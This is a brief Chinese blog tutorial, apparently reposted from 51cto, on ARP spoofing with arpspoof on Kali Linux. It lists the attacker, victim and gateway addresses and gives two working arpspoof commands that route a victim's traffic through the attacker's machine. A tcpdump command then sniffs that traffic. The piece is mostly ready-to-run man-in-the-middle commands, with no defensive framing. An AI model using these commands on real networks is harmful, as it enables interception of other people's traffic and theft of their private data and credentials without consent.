标签:arpspoof
kail:172.16.1.254
被攻击者:172.16.1.103
网关:172.16.1.1
kail linux 打开两个终端,
1、arpspoof -i wlan0 -t 172.16.1.103 172.16.1.1
将 172.16.1.103 发给网关172.16.1.1的数据先发送到本机,再由本机进行转发,前提是本机已经开启路由。
2、arpspoof -i wlan0 -t 172.16.1.1 172.16.1.103
将 网关172.16.1.1 发往172.16.1.103 的数据先发送到本机,再由本机进行转发。
通过以上两条命令可以保证172.16.1.103 的请求和回包都会经过本机。进而可以通过本机上的嗅探工具进行分析。
最简单的tcpdump -nnvvi wlan0 host 172.16.1.103
本文出自 “lihongweibj” 博客,请务必保留此出处http://lihongweibj.blog.51cto.com/6235038/1771277
标签:arpspoof
原文地址:http://lihongweibj.blog.51cto.com/6235038/1771277